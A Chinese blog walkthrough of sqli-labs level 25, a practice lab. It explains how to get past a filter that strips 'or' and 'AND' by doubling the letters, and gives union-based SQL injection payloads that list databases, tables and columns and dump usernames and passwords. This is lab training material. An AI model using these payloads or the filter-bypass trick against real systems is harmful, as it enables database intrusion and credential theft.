sqli-labs 第25關(過濾or和AND )

寮犻懌瓚發表於2020-12-25

25關

原始碼分析
發現閉合點是的單引號
在這裡插入圖片描述將or和AND替換成了空格
在這裡插入圖片描述然後我們就來思路了,我們可以使用聯合查詢還有報錯查詢

一、判斷注入點

在這裡插入圖片描述

二、判斷列數

發現很直觀的把我們的or給過濾掉了
我們試試雙寫
在這裡插入圖片描述在這裡插入圖片描述三、構造payload

?id=-1' union select 1,2,3--+

在這裡插入圖片描述1.爆庫、

?id=-1' union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+ 

由於information中間也有一個or,所以說也得雙寫
在這裡插入圖片描述2.爆表

?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema="security"--+ 

在這裡插入圖片描述3.爆欄位

?id=-1' union select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name="users"--+ 

在這裡插入圖片描述4.爆資料

?id=-1' union select 1,group_concat(username,0x5c,passwoorrd),3 from users --+ 

在這裡插入圖片描述

相關文章